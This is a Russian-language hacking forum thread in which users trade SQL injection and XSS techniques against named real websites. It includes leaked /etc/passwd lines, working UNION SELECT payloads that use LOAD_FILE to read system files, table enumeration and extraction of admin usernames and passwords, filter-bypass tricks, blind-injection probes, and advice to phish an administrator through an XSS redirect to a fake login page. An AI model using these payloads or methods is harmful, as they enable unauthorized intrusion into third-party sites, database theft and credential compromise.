daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown

и тд..

ftpusers
http://www.nap.edu/topics.php?topic=-350+union+select+1,2,LOAD_FILE(0x2f6574632f686f737 473),4,5,6,7,8,9,10,11/*
syslog.conf
http://www.nap.edu/topics.php?topic=-350+union+select+1,2,LOAD_FILE(0x2f6574632f7365727 669636573),4,5,6,7,8,9,10,11/*

Спасибо. Где можна почитать про Load_file(char()) ??
А что тут непонятного. Главное знать какой файл открывать. При фильтрации ковычек кодируешь строку

тут на ачате полно статей о скулях и о лоад_файл
http://forum.antichat.ru/thread19844.html
http://forum.antichat.ru/showthread.php?p=407222#post407222

еще тут
http://injection.rulezz.ru/

а вообще поиск)))

А что тут непонятного. Главное знать какой файл открывать. При фильтрации ковычек кодируешь строку

добавлю, кодировать можно тут -> _http://h4k.in/encoding/index.php вставляешь нужный текст, выбираешь способ кодирования, например, to SQL HEX()

Подскажите что делать дальше
_http://snowproject.ru/dj_details.php?did=-1+union+select+1,2,3,4,5,6,7/*

Читал мануалы, но немогу угадать название базы.

Вначале определяем версию.
http://snowproject.ru/dj_details.php?did=-1+union+select+1,2,3,version(),5,6,7/*
Ура 5 мускул!
Дальше проще....
http://snowproject.ru/dj_details.php?did=-1+union+select+1,2,3,table_name,5,6,7%20from%20inf ormation_schema.tables%20limit%200,1/*
limit 1,1 , limit 2,1 ... и т.д.
Исследуем структуру базы.... дальше по обстоятельствам.

Мэн поясни поподробней плиз, что теперь мне это даёт и как сформировать запрос на user:pass.
0 - CHARACTER_SETS
1 - COLLATIONS
3 - COLUMNS
4 - COLUMN_PRIVILEGES
5 - KEY_COLUMN_USAGE
6 - PROFILING
7 - ROUTINES
8 - SCHEMATA
9 - SCHEMA_PRIVILEGES
10 - STATISTICS
11 - TABLES
12 - TABLE_CONSTRAINTS
13 - TABLE_PRIVILEGES
14 - TRIGGERS
15 - USER_PRIVILEGES
16 - VIEWS
17 - banners
18 - contacts
19 - djs
20 - gen_sets

Все лежит в таблице gen_sets тама есть нужные тебе поля login и password
нужный тебе юзер в данном случае - root
пароль - найди сам :) , а то ведь так не интересно. И еще тебе нужно найти куда это подставить.
З.Ы. Я нашел и проверил. Работает.

З.З.Ы. И еще.... почитай мануалы внимательней, а то ты писал что читаешь....

То Red_Red1 - Респект, спасибо!

есть жоступ к админке, но могу только добавлять новости\статьи. при этом ничего не фильтруется. можно как-нибудь залить шелл?

Ну ты б поподробнее описал все: мож эта известная цмска, есть ли возможность заливать картинки или прекреплять файлы и т.д.

http://www.0629.com.ua/view_news.php?id_news=
Прописываю: http://www.0629.com.ua/view_news.php?id_news=http://mail.ru
Пишет: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '://mail.ru' at line 1

Можно ли как нибудь загрузить шелл?

2 WebeX
По поводу шелла - мое мнение нельзя. Но тама есть скуля в другом скрипте
http://www.0629.com.ua/news.php?cat=-7+union+select+1,2,3,4,database(),version(),7,8,9, 10,11,12,13,14,15,user(),17,18,19,20,21,22/*
Однако с реализацией будут сложности - у пользователя под которым выполняется скрипт нету доступа ко всем таблицам. Например я пытался обратиться к таблице форума forum.phpbb_users, пишет доступ запрещен. Есть админка сайта /admin/ но таблицы я не нашел, да и туда наверное закрыт доступ....

2 WebeX
По поводу шелла - мое мнение нельзя. Но тама есть скуля в другом скрипте
http://www.0629.com.ua/news.php?cat=-7+union+select+1,2,3,4,database(),version(),7,8,9, 10,11,12,13,14,15,user(),17,18,19,20,21,22/*
Однако с реализацией будут сложности - у пользователя под которым выполняется скрипт нету доступа ко всем таблицам. Например я пытался обратиться к таблице форума forum.phpbb_users, пишет доступ запрещен. Есть админка сайта /admin/ но таблицы я не нашел, да и туда наверное закрыт доступ....
+, у меня тоже знакомый пробовал но так и ничего пока не вышло, его заблочили, вернее его ИП

Реализовал sql инъекцию на одном крупном форуме phpBB, нашел интересующие меня таблицы и колонки,записей там около 6500 штук,меня интересует можно ли как-то вытянуть все записи в один файл,ибо инфа выводится лимитом только по 1 единице.

спасибо.

Реализовал sql инъекцию на одном крупном форуме phpBB, нашел интересующие меня таблицы и колонки,записей там около 6500 штук,меня интересует можно ли как-то вытянуть все записи в один файл,ибо инфа выводится лимитом только по 1 единице.

спасибо.
Вариант 1. Можешь просто расшифровать хеш админа, залезть в админку, и слить базу.
Вариант 2 (Маловероятный). Если доступен file_priv, то можно сохранить всё что нужно в отдельный файл.

Зашёл на портальчик один, вбил в их поиск <script>alert('xxx')</script> Исправно экран вылезло ххх. вбиваю туда же: '';!--"<fuck>=&{()}. Смотрю сурс - пусто, ни fuck, ни символов. Подскажите как извлечь полезность из сложившейся ситуации..
Ксс не активная, так что записи в сурс страницы не будет. А ксс в поисковиках довольно распространены. Смотяр какой сайт, если сайт без юзеров (т.е. нету нормальной формы авторизации и т.д.) то толку впринципе 0.

Пипл, у мну маленькая проблема, при запросе к мускулу, фильтруется точка - "." , что не дает возможности селектить из mysql.user, выдает ошибку "Table 'site.mysql_user' doesn't exist"
Как обойти фильтрацию точки?

Пипл, у мну маленькая проблема, при запросе к мускулу, фильтруется точка - "." , что не дает возможности селектить из mysql.user, выдает ошибку "Table 'site.mysql_user' doesn't exist"
Как обойти фильтрацию точки?
попробуй через char

Учим английский язык. doesn't exist == не существует. Да и кто тебе сказал что идёт фильтрация на точку? Дай ссылку

Как с чего я взял что точка фильтруется ? Ну если я посылаю mysql.user, а мне возвращается mysql_user, наверное, точка фильтруется, не просто же так мне вместо точки пробел "_" вернулся

попробуй через char

Хм, по моему char нельзя использовать в запросе, если селектишь имя таблицы, его мона использовать только при выводе

Как с чего я взял что точка фильтруется ? Ну если я посылаю mysql.user, а мне возвращается mysql_user, наверное, точка фильтруется, не просто же так мне вместо точки пробел "_" вернулся

Хм, по моему char нельзя использовать в запросе, если селектишь имя таблицы, его мона использовать только при выводе
Может ты всё таки дашь ссылку на сайт? Если не хочешь показывать всем, скинь в пм.

Скуля:

http://wap.intone.ru/games/wgetgame.php?partner=424&id=-22683372+union+select+1,2,3,4,5,version(),7,8,9,10 ,11,12,13,14,15,16,17,18,19/* вроде бы все работает...

Но при подборе таблиц с помощью from кидает на непонятную страницу,
в чем тут заморочка?

fobofob, в скрипте фильтрация по слову from. ничего не вытащишь оттуда. через эту дырку по крайней мере.

2 fobofob

Попробуй вот так fr/**/om
если там действительно фильтр на from. Жаль неизвесна ни одна таблица чтобы проверить.

Скуля
код:

http://www.wm.lookmy.info/index.php?id=1868&show=news&newsid=-1662+union+select+1,2,3/*

принтабельные поля 2 и 3,но почему-то при запросе version() либо user(),выдает пустую страницу

или тут отсекаются все запросы к бд? Подскажите пожалуйста.

тупо парсятся user() database() version() в гет запросе ))) фром и все остальное не проверяется.

тупо парсятся user() database() version() в гет запросе ))) фром и все остальное не проверяется.

Там по моему 5 мускул,так как при запросе information_schema выдается пустая страница,вместо сообщения об ошибке от сервера,значит остается жопный вариант подбирать названия вручную?

fobofob, для вытаскивания колонок из таблицы не нужны user() database() и version()..совсем)) Так что дерзай

тупо парсятся user() database() version() в гет запросе ))) фром и все остальное не проверяется.

несовсем, там парсятся вобще скобки ()

2fobofob

все работает:
http://www.wm.lookmy.info/index.php?id=1868&show=news&newsid=-1662+union+select+1,2,table_name%20from%20informat ion_schema.tables/*

ЗЫ на одном хек портале была скуля, так там скобки фильтровались, пробелы (ну и плсенги) надо было /**/ ставить, но самое прикольное что в гет запросе был фильтр на префикс к таблицам форума, например если в гет запросе встречается phpbb_ , то сразу кидает на индекс... и такое бывает

Здравствуйте.
Помогите пожалуйста, такой вопрос:
Есть сайт, вход в админку там через http авторизацию. Так же на сайте есть XSS в поисковике. Каким образом можно отрулить логин и пароль админа ?
вот сайт http://www.butik.ru/

Сделать фейк, подснуть админу xss-вектор с редиректом на фейк(при этом заюзав урл спуффинг) и надеяться, что когда он попадет на фейк(и попадет ли вообще), то ему страшно захочеться ввести логин и пароль

Здравствуйте.
Помогите пожалуйста, такой вопрос:
Есть сайт, вход в админку там через http авторизацию. Так же на сайте есть XSS в поисковике. Каким образом можно отрулить логин и пароль админа ?
вот сайт http://www.butik.ru/
Попробуй реализовать поддельную HTTP авторизацию через JavaScript и использовать СИ, например сказать, что в админку можно пройти без пароля и дать ему ссылку.
Но если логин и пасс после авторизации сохраняются в кукисы, то можно просто их украсть. А узнать без его помощи вряд ли получится.

Такая ситуация: есть таблица юзеров форума - abc_user. Таблица находится в базе - abc-forum. Когда я пишу скулю

site.com/fname.php?id=-1+union+select+1,username,2+from+abc-forum.abc_user/*

выводиться такая ошибка

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-forum.abc_user/*'

Проблема как я понимаю в тире в имени базы. Подскажите, что делать с этим тире?

У меня как-то фильтровалось нижнее подчеркивание и точка. Вышел из положения урл кодированием... незнаю как это понимать но факт был. Кодировал название таблицы в урл коды и запрос работал без этого нет.

Нашел инъекцию, не blind, только при следующем запросе http://www.motonews.ru/news.moto?id=-1+union+select+1,password,3,4,5+from+aprilia_april ia.user/*&catid=52
сообщение об ошибке пропадает и страница отображается без проблем. load_file вроде работает. Скорее всего, настроена фильтрация. Может попробовать шелл залить? Или пытаться обойти фильтр?

VentRu как там дела с magic quotes обстоят?

да вроде в on.

:( Уже прикрыли. По крайней мере, ошибки синтаксиса уже нет.

Подскажите,как добиться вывода инфы, нашел скулю юнион работает,принтабельных полей 3(подобрал ордером),а выводить не выводит!

Пример http://gbc.ge/index.php?kw=mcg&m=search&ncat=-23'+union+select+1,2,3/*&lang=rus

Подскажите,как добиться вывода инфы, нашел скулю юнион работает,принтабельных полей 3(подобрал ордером),а выводить не выводит!

Пример http://gbc.ge/index.php?kw=mcg&m=search&ncat=-23'+union+select+1,2,3/*&lang=rus

1) Если ты уверен что какие то поля выводятся, то скорее всего ты не правильно подобрал кол-во колонок (или не правильно составил подзапрос). Так что вначале перепроверь как ты все сделал.

2) Версия мускула может быть 3 и тогда твой подзапрос будет бесполезен, с такой версией ты мало чего сделаешь.

3) Иногда вывод может быть виден в исходниках страницы (я про html, а не php), т.е. для просмотра идешь в Вид-Исходный текст (это в опере) и там находишь колонки которые вывелись. Да кстати если тебе нужно будет закрыть какой нидь тег, то прям так и дописываешь, к примеру: concat('</title>',выводимая в теге колонка) - тогда тут вывод будет уже не в тайтале, а на самой странице.

4) Если есть sql-инъекция то можешь попробывать посимвольный брут (+and+substring(version(),1,1)=5 и т.д.). Правда это займёт очень много времени.

Подскажите,как добиться вывода инфы, нашел скулю юнион работает,принтабельных полей 3(подобрал ордером),а выводить не выводит!

Пример http://gbc.ge/index.php?kw=mcg&m=search&ncat=-23'+union+select+1,2,3/*&lang=rus

неувидел там инъекции... с чего ты взял, что она есть?

неувидел там инъекции... с чего ты взял, что она есть?
Вообщем инъекция там есть, правда слепая =\
Для того чтобы была не слепая надо зарегаться на сайте, а это только за $ - поэтому тут надо выбирать либо на халяву но ппц как долго, либо заплатить 1$ и в течении часа все слить =)

Со слепой (если решишь все-таки продолжить) есть один нюанс - подзапросы с and не катят, поэтому надо через or - соответственно логика обратная, пример:
http://gbc.ge/index.php?kw=mcg&m=search&ncat=23'+or+(select+substring(version(),1,1)=5)/*&lang=rus
такой запрос выведет норм страницу - значит первая цифра версии не 5!
а вот такой запрос
http://gbc.ge/index.php?kw=mcg&m=search&ncat=23'+or+(select+substring(version(),1,1)=4)/*&lang=rus
выведет пустую страницу - значит первая цифра версии 4!
Вообщем я думаю логика понятна =)
Версия там 4.x.x.(MySQL)
дальше если есть желание перебором как написал Grey по именам таблиц, столбцов и т.д...

Хм, да есть... просто во-первых меня смутило отсутсвие and, а во-вторых я наверное че-то напутал, так как когда я пробовал после его запроса (после отсечения /*) поставить кавычку вылетала ошибка, вобщем глюканул или я или... скорее всего я

ребята, как раскрутить вот эту http://moto-life.com.ua/index/57' Sql иньекцию?

Помогите пожалуйста никак не могу подобрать количество полей.
Пробовал и order by и group by и вручную дошел до 43 ничего не получается???
http://www.radiocomponent.net/prices.php?companyPK=1+union+select+1,2,3,4,5,6,7, 8,9,10,11,12,13,14,15,16,17,18,19,20,21,23,24,25,2 6,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42, 43+from+companies+limit+0,1/*

ht_tp://www.skautai.lt/users.php?id=1)+order+by+1/*


помогите найти inj плз

http://sirius.ldz.lv/sari/saraksts.asp?lngg=xek
Возможно что-то вывести?

Хех, тут инъекция в select как я понял, это значит надо еще таблицу подбирать
вот пример того как:
http://sirius.ldz.lv/sari/saraksts.asp?lngg=lv%20from%20table1--

если подобрать это, то можно нарыть че нить например из системных таблиц sysibm можно узнать версию, пользователя и название базы, также после подбора можно будет узнать таблицы и колонки и соответственно вывести какуюто инфу из этого всего

ЗЫ я в DB2 неочень, так что поправьте меня если я неправ

ЗЗЫ Можно наверное и из других скриптов что то узнать, но меня самого именно этот вариант заинтересовал, т.к. инъекцию в Select я первый раз увидел

вот кажется нашёл sql инекцию http://epood.atf.ee/index.php?categoryID=402' пробовал подобрать поля,перебрал 50 полей , но ничего не получилось подскажите что не так сделал и есть ли там вообще инекция?
п.с. подбирал:id=9999+union+select+null,null,nu ll......../* и так далее

http://epood.atf.ee/index.php?categoryID=-402+order+by+1/*
http://epood.atf.ee/index.php?categoryID=-402+union+select+1/*
смотреть вывод в коде страницы.

Подскажите что можно сделать с этой скулей
код:

http://forum.tomsk.ru/forum.php?a=9&g=34+order+by+9/*&t=713344

при запросе юнион селект кидает на главную страницу

2 fobofob
На том же сайте вот тут http://forum.tomsk.ru/forum.php?a=24&user_id=-1357+union+select+111,222,3,4,555,666,7,8,9,10/*
такой проблемы нету.
Надеюсь помог :)

Т.к. я начинающий, то в процессе обучения возник вопрос :)

Вскрыл сайт с SI, добыл следующую инфу:

таблица 1:
access_code,firstname,lastname,password
123800876,Adam,Smith,bigdog (из MD5)

таблица 2:
name,is_superuser,api_password,password
Adam Smith,1,NhaXbNfmzppAE,fsH1sRBI6rLuQ

С первой таблицей все ясно - ее данные подходят к входу на форум, но не подходят к админке :( Не могу понять, к чему относятся данные из второй таблицы. Особенно интересуют поля api_password и password. Вопрос: хешированы они или нет? Если хешированы, то чем можно их забрутить? Что такое access_code? И последний вопрос - к чему могут относиться данные из второй таблицы?

Доп.инфа: в первой таблице юзверей более 2 тысяч, во второй - пяток.

Это DES (13 симв)... password- это понятно (хотя несовсем)... api_password - возможно это
admin panel interface тоесть админка... password-это допустим доступ к сайту, api_password - это пароль доступа в админку...
может быть api_password - это ключ шифрования DES-хеша, а password - это зашифрованный ключем api_password хеш пароля
хотя врядли все так сложно, т.ч. скорей всего первый вариант

Это DES (13 симв)
Спасибо за подсказку. А DES чем-нибудь брутится? Может онлайн-сервисы какие есть?

Спасибо за подсказку. А DES чем-нибудь брутится? Может онлайн-сервисы какие есть?

Онлайн незнаю, скорее их нет, а вот passwordpro 2.2.6 точно брутит

http://www.arsenal-electro.ru/news_page.php?id=-11%20union+select+1,2,3,4/*
как посмотреть версию бд? там походу фильтрация какая-то странная... это одна из моих первых скулей =))

и еще
http://www.haber20.net/news_page.php?m=1&id=-2541
там выводится id. что-то можно с этим сделать?

и вот еще. что здесь?
http://www.atn-night-vision.com/news_page.php?id=-2%20union+select+1,2,3,4,5/*

аналогично
http://jdbasketball.com/news_page.php?id=14'

http://www.arsenal-electro.ru/news_page.php?id=-11%20union+select+1,2,3,4/*
как посмотреть версию бд? там походу фильтрация какая-то странная... это одна из моих первых скулей =))

http://www.arsenal-electro.ru/news_page.php?id=-11%20union+select+1,2,convert(version()+using+cp12 51),4/*
кодировка^

http://www.haber20.net/news_page.php?m=1&id=-2541
там выводится id. что-то можно с этим сделать?

там скули нет, там пассивная XSS

http://www.haber20.net/news_page.php?m=1&id=2542%3Cscript%3Ealert(121212121)%3C/script%3E


насчет скули, наряду с вариантом ice1k`a возможен еще такой вариант:
http://www.arsenal-electro.ru/news_page.php?id=-11%20union+select+1,2,aes_decrypt(aes_encrypt(user (),0x71),0x71),4/*

aes_decrypt(aes_encrypt(user(),0x71),0x71)
почему это прокатывает? это шифрование типа ксора?

aes_decrypt(aes_encrypt(user(),0x71),0x71)
почему это прокатывает? это шифрование типа ксора?

Нет, это шифрование типа AES, вернее точно AES...

получается так, что ты шифруешь данные user() (функция aes_encrypt() ) с ключем 0x71, а потом сразуже расшифровываешь то что зашифровал(функция aes_decrypt() ) c этим же ключем, и в используемой кодировке

у меня еще несколько вопросов.
1. http://www.wolfpublishers.nl/us/news.php?id=-15%20union+select+1,2/*
тут просто ошибка скрипта, а скуля нет, так?
2. когда надо ставить перед значением параметра минус, а когда кавычку после?
3. что можно сделать, кроме брута, если версия бд меньше 5?
ЗЫ пост http://forum.antichat.ru/showpost.php?p=497322&postcount=251 все еще актуален =)